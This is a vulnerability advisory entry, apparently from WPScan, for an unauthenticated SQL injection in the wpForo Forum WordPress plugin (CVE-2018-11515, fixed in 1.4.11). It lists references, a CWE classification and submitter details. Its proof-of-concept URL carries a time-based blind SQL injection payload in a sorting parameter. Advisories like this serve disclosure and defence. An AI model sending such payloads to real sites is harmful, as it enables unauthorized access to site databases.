wpForo Forum <= 1.4.9 - Unauthenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
http://www.example.com/index.php/community/?wpfd=0&wpfob=relevancy&wpfo=desc%2c(select*from(select(sleep(20)))a)&wpfs=fff&wpfin=entire-posts

Affects Plugin

fixed in version 1.4.11

References

CVE 2018-11515
URL https://github.com/DediData/wpforo/issues/1
URL https://wpforo.com/community/general-discussions/wpforo-removed-from-wordpress-org/
URL https://plugins.trac.wordpress.org/changeset/1868687/wpforo

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Ryan
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 757
Verified Yes
WPVDB ID 9089

Timeline

Publicly Published 2018-05-27 (3 months ago)
Added 2018-05-30 (3 months ago)
Last Updated 2018-08-05 (13 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.